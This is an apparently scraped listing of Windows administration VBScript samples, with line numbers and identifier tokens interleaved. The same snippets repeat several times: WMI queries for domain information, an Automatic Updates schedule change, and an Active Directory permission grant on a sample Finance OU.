
    Put

    Array

    568

    objSDUtil.SetInfo

    SetInfo

    576

    On Error Resume Next

    578

    strComputer = "."

    579

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    582

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    585

    For Each objItem in colItems

    586

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    587

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    588

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    589

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    590

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    591

    Wscript.Echo

    Echo

    592

    Next

    596

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    597

    Set objSettings = objAutoUpdate.Settings

    Settings

    599

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    600

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    602

    objSettings.Save

    Save

    609

    On Error Resume Next

    611

    strComputer = "."

    612

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    615

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    617

    For Each objItem in colItems

    618

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    619

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    620

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    621

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    622

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    624

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    626

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    627

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    628

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    629

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    630

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    631

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    632

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    633

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    634

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    636

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    638

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    639

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    640

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    641

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    642

    Wscript.Echo

    Echo

    643

    Next

    650

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    651

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    652

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    653

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    654

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    656

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    657

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    658

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    660

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    662

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    663

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    664

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    665

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    666

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    667

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    668

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    669

    objDacl.AddAce objAce

    AddAce

    671

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    673

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    674

    objSDUtil.SetInfo

    SetInfo

    682

    On Error Resume Next

    684

    strComputer = "."

    685

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    688

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    691

    For Each objItem in colItems

    692

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    693

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    694

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    695

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    696

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    697

    Wscript.Echo

    Echo

    698

    Next

    702

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    703

    Set objSettings = objAutoUpdate.Settings

    Settings

    705

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    706

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    708

    objSettings.Save

    Save

    715

    On Error Resume Next

    717

    strComputer = "."

    718

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    721

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    723

    For Each objItem in colItems

    724

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    725

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    726

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    727

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    728

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    730

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    732

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    733

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    734

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    735

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    736

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    737

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    738

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    739

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    740

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    742

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    744

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    745

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    746

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    747

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    748

    Wscript.Echo

    Echo

    749

    Next

    755

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    756

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    757

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    758

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    759

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    761

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    762

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    763

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    765

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    767

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    768

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    769

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    770

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    771

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    772

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    773

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    774

    objDacl.AddAce objAce

    AddAce

    776

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    778

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    779

    objSDUtil.SetInfo

    SetInfo

    787

    On Error Resume Next

    789

    strComputer = "."

    790

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    793

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    796

    For Each objItem in colItems

    797

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    798

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    799

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    800

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    801

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    802

    Wscript.Echo

    Echo

    803

    Next

    807

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    808

    Set objSettings = objAutoUpdate.Settings

    Settings

    810

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    811

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    813

    objSettings.Save

    Save

    820

    On Error Resume Next

    822

    strComputer = "."

    823

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    826

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    828

    For Each objItem in colItems

    829

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    830

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    831

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    832

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    833

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    835

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    837

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    838

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    839

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    840

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    841

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    842

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    843

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    844

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    845

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    847

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    849

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    850

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    851

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    852

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    853

    Wscript.Echo

    Echo

    854

    Next

    860

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    861

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    862

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    863

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    864

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    866

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    867

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    868

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    870

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    872

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    873

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    874

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    875

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    876

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    877

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    878

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    879

    objDacl.AddAce objAce

    AddAce

    881

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    883

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    884

    objSDUtil.SetInfo

    SetInfo

    892

    On Error Resume Next

    894

    strComputer = "."

    895

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    898

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    901

    For Each objItem in colItems

    902

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    903

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    904

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    905

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    906

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    907

    Wscript.Echo

    Echo

    908

    Next

    912

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    913

    Set objSettings = objAutoUpdate.Settings

    Settings

    915

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    916

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    918

    objSettings.Save

    Save

    925

    On Error Resume Next

    927

    strComputer = "."

    928

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    931

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    933

    For Each objItem in colItems

    934

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    935

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    936

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    937

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    938

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    940

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    942

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    943

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    944

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    945

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    946

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    947

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    948

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    949

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    950

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    952

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    954

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    955

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    956

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    957

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    958

    Wscript.Echo

    Echo

    959

    Next

    965

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    966

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    967

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    968

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    969

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    971

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    972

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    973

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    975

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    977

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    978

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    979

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    980

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    981

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    982

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    983

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    984

    objDacl.AddAce objAce

    AddAce

    986

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    988

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    989

    objSDUtil.SetInfo

    SetInfo

    997

    On Error Resume Next

    999

    strComputer = "."

    1000

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1003

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1006

    For Each objItem in colItems

    1007

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1008

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1009

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1010

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1011

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1012

    Wscript.Echo

    Echo

    1013

    Next

    1017

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1018

    Set objSettings = objAutoUpdate.Settings

    Settings

    1020

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1021

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1023

    objSettings.Save

    Save

    1030

    On Error Resume Next

    1032

    strComputer = "."

    1033

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1036

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1038

    For Each objItem in colItems

    1039

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1040

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1041

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1042

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1043

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1045

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1047

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1048

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1049

    Wscript.Echo "Domain Name: " & objItem.DomainName

    Echo

    DomainName

    1050

    Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag

    Echo

    DSDirectoryServiceFlag

    1051

    Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag

    Echo

    DSDnsControllerFlag

    1052

    Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag

    Echo

    DSDnsDomainFlag

    1053

    Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag

    Echo

    DSDnsForestFlag

    1054

    Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag

    Echo

    DSGlobalCatalogFlag

    1055

    Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag

    Echo

    DSKerberosDistributionCenterFlag

    1057

    Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag

    Echo

    DSPrimaryDomainControllerFlag

    1059

    Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag

    Echo

    DSTimeServiceFlag

    1060

    Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag

    Echo

    DSWritableFlag

    1061

    Wscript.Echo "Name: " & objItem.Name

    Echo

    Name

    1062

    Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact

    Echo

    PrimaryOwnerContact

    1063

    Wscript.Echo

    Echo

    1064

    Next

    1071

    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5

    1072

    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1

    1073

    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2

    1074

    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100

    1075

    Const ADS_ACEFLAG_INHERIT_ACE = &H2

    1077

    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")

    GetObject

    1078

    Set objSD = objSDUtil.Get("ntSecurityDescriptor")

    Get

    1079

    Set objDacl = objSD.DiscretionaryAcl

    DiscretionaryAcl

    1081

    Set objAce = CreateObject("AccessControlEntry")

    CreateObject

    1083

    objAce.Trustee = "FABRIKAM\kmyer"

    Trustee

    1084

    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    1085

    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    1086

    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    1087

    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"

    ObjectType

    1088

    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"

    InheritedObjectType

    1089

    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    1090

    objDacl.AddAce objAce

    AddAce

    1092

    objSD.DiscretionaryAcl = objDacl

    DiscretionaryAcl

    1094

    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)

    Put

    Array

    1095

    objSDUtil.SetInfo

    SetInfo

    1103

    On Error Resume Next

    1105

    strComputer = "."

    1106

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")

    GetObject

    1109

    Set colItems = objWMIService.ExecQuery("Select * from SFU_Domain")

    ExecQuery

    1112

    For Each objItem in colItems

    1113

    Wscript.Echo "DC: " & objItem.DC

    Echo

    DC

    1114

    Wscript.Echo "Default: " & objItem.Default

    Echo

    Default

    1115

    Wscript.Echo "Domain: " & objItem.Domain

    Echo

    Domain

    1116

    Wscript.Echo "Key Name: " & objItem.KeyName

    Echo

    KeyName

    1117

    Wscript.Echo "Maps: " & objItem.Maps

    Echo

    Maps

    1118

    Wscript.Echo

    Echo

    1119

    Next

    1123

    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")

    CreateObject

    1124

    Set objSettings = objAutoUpdate.Settings

    Settings

    1126

    objSettings.ScheduledInstallationDay = 3

    ScheduledInstallationDay

    1127

    objSettings.ScheduledInstallationTime = 4

    ScheduledInstallationTime

    1129

    objSettings.Save

    Save

    1136

    On Error Resume Next

    1138

    strComputer = "."

    1139

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    GetObject

    1142

    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")

    ExecQuery

    1144

    For Each objItem in colItems

    1145

    Wscript.Echo "Client Site Name: " & objItem.ClientSiteName

    Echo

    ClientSiteName

    1146

    Wscript.Echo "DC Site Name: " & objItem.DcSiteName

    Echo

    DcSiteName

    1147

    Wscript.Echo "Description: " & objItem.Description

    Echo

    Description

    1148

    Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName

    Echo

    DnsForestName

    1149

    Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress

    Echo

    DomainControllerAddress

    1151

    Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType

    Echo

    DomainControllerAddressType

    1153

    Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName

    Echo

    DomainControllerName

    1154

    Wscript.Echo "Domain GUID: " & objItem.DomainGuid

    Echo

    DomainGuid

    1155

